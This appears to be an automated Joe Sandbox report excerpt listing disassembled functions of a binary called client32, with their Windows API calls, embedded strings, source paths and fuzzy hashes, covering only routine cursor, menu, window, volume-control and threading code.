                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1216912278-2830328467
                                                                                • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(76967AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                                • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                  • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                                • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                • String ID:
                                                                                • API String ID: 3235510773-0
                                                                                • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                                • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                                Function 11139960 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                                • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                                • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                                • UI.CPP, xrefs: 111399BD
                                                                                • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                                • API String ID: 1808733558-973815363
                                                                                • Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                • Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
                                                                                • Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                • Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795
                                                                                Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                • String ID:
                                                                                • API String ID: 705253285-0
                                                                                • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                • API String ID: 2776021309-3012761530
                                                                                • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101D66E
                                                                                • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                • String ID: 0
                                                                                • API String ID: 430917334-4108050209
                                                                                • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 2375713580-0
                                                                                • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
